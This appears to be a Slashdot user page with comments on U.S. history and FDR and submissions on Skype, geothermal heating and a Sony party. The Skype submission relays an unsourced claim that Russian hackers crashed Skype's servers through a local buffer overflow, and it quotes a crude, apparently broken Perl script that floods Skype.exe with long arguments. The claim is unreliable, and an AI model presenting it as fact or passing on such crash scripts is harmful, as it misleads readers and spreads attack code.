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Comment Re:without any humans ever having been involved (Score 1) 898

Tell me if you spot one of these "free societies." America hasn't been one for about 150 years, and the decay has been getting worse for the last 60 or so.

Wrong idea, right time. The Civil War (and the resulting amendments):

  1. removed states right to secede (it was supposed to be legal, iirc), and other states rights as well.
  2. extended applicability of federal law to states and state actions.

My point was that the United States was obviously not a free society prior to the civil war, at least by most reasonable definitions of the term. Similarly, claiming the US has become simply "less free" in the past 60 years is laughable. Women and minorities have seen huge strides in the path toward establishing their personal freedoms. To just pick one arbitrary example, it wasn't until 1966 that beating became grounds for divorce in New York - and women still had to prove that a "sufficient" number of beatings had taken place.

I strongly believe in a free society, but let's not pretend that the United States used to be some kind of paradise and only the federal government is to blame for our problems - that's pure ideology.

Comment Re:Two words (Score 1) 3709

By that measure FDR would qualify as "evil" - his policies (including the US' insistence on the gold standard long after other nations abandoned it) extended the Depression for the US for at least 6 years and caused suffering to millions of people.

I agree with your sentiment, but I have to say that your "facts" about FDR are a little off. First, most people say that FDR took the US off the gold standard.

Second, the claim that he "extended the Depression" is based, from what I can tell, entirely on work by Cole and Ohanian that is not exactly universally accepted by economists. It assumes that neoclassical growth theory is correct and then tries to explain why it fails to account for the slow recovery from the Great Depression.

They only 'prove' that FDR's policies were at fault if you assume that their theory correctly accounts for the growth that didn't actually occur. Yes, sounds pretty convoluted - that's the great part about the social sciences. You can make claims about causes based on data that doesn't exist.


Submission + - Skype crash has been caused by Russian hackers ( 8

An anonymous reader writes: Yesterday's Skype worldwide crash has been caused by Russian hackers, as per forum info ( They have found a local buffer overflow vulnerability caused by sending a long string to the Skype authorisation server. Within several hours those guys managed to take offline all Skype servers and prevent users from logging in. Here is exploit's code: [code]#!/usr/bin/perl # Simle Code by Maranax Porex ;D # Ya Skaypeg!! for ($i=256; $i>xCCCCC; $i=$i+256) { $eot='AAAA' x $i; call_sp(); } exit; sub call_sp() { $str="\"C:\\Program Files\\Skype\\Phone\\Skype.exe\" \"/uri:$eot\""; system("$str"); }[/code]

Submission + - Heating Your Home With A Geothermal Pump

Makarand writes: This article in the Chronicle describes how geothermal pumps could be used to heat our homes instead of natural gas or electricity. These pumps rely on the fact that regardless of what the surface temperature of the earth is, it is always 60 degrees a few hundred feet below. You have to drill a few holes 200 feet deep and insert U-shaped tubes in them and connect these to a heat exchanger. The tubes are filled with a solution of water and alcohol to prevent corrosion. Circulation pumps drive the water solution through the tubes in the ground and when the solution comes up from underground it is warm because it has passed through an environment of about 60 degrees.The heated liquid then is passed through the heat exchanger which takes care of the business of heating your home.

Submission + - Sony Celebrates God of War 2 with Decapitated Goat

Serzen writes: In what can only be called a puzzling move, Sony's launch party for God of War II featured topless women, at least one dead goat and an "offal" eating competition. Almost entirely too strange for words, the Daily Mail covers some of it here. Even with the goat censored out, the woman is only wearing body paint for a top, so use some caution if viewing at work.

Apparently photos from the event can be seen in subscriber's editions of PlayStation magazine, but copies bound for retail have been recalled.

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